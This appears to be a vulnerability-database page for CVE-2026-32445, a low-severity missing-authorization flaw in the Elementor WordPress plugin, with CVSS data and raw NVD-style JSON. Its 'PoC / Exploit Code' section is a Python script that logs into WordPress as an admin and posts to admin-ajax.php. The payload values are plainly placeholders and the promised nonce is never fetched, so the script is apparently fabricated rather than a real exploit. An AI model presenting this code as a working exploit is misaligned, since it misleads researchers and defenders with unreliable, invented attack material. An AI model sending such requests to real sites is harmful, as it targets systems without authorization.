Security Vulnerability Report
中文
CVE-2026-32445 CVSS 2.7 LOW

CVE-2026-32445

Published: 2026-03-13 19:55:05
Last Modified: 2026-04-22 21:30:26

Description

Missing Authorization vulnerability in Elementor Elementor Website Builder elementor allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Elementor Website Builder: from n/a through <= 3.35.5.

CVSS Details

CVSS Score
2.7
Severity
LOW
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Elementor Website Builder < 3.35.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import json # CVE-2026-32445 PoC - Elementor Missing Authorization # Target: WordPress site with Elementor Plugin <= 3.35.5 TARGET_URL = "https://target-site.com" # Authentication required - High privilege account needed USERNAME = "admin" PASSWORD = "password" def get_auth_token(): """Get WordPress authentication nonce""" login_url = f"{TARGET_URL}/wp-login.php" session = requests.Session() # Login to WordPress login_data = { 'log': USERNAME, 'pwd': PASSWORD, 'wp-submit': 'Log In' } session.post(login_url, data=login_data) # Get Elementor nonce nonce_url = f"{TARGET_URL}/wp-admin/admin-ajax.php?action=elementor_ajax" return session, nonce_url def exploit_missing_auth(): """Exploit CVE-2026-32445: Missing Authorization in Elementor""" session, nonce_url = get_auth_token() # Target Elementor API endpoint with missing auth check api_endpoints = [ f"{TARGET_URL}/wp-json/elementor/v1/", f"{TARGET_URL}/wp-admin/admin-ajax.php" ] # Malicious request targeting improperly secured endpoint exploit_data = { 'action': 'elementor_ajax', 'route': 'affected_waypoint', 'data': { 'element_context': '_pr_HighPrivilege_Action', 'call': 'trigger_access_control_bypass' } } print("[*] Sending exploit request to Elementor endpoint...") response = session.post(nonce_url, data=exploit_data) if response.status_code == 200: print("[+] Potential authorization bypass detected") print(f"[+] Response: {response.text}") else: print("[-] Exploit failed or patched") if __name__ == "__main__": exploit_missing_auth()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-32445", "sourceIdentifier": "[email protected]", "published": "2026-03-13T19:55:05.090", "lastModified": "2026-04-22T21:30:26.497", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Elementor Elementor Website Builder elementor allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Elementor Website Builder: from n/a through <= 3.35.5."}, {"lang": "es", "value": "Vulnerabilidad por falta de autorización en Elementor Elementor Website Builder elementor permite la explotación de niveles de seguridad de control de acceso configurados incorrectamente. Este problema afecta a Elementor Website Builder: desde n/a hasta &lt;= 3.35.5."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:N", "baseScore": 2.7, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/elementor/vulnerability/wordpress-elementor-website-builder-plugin-3-35-5-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}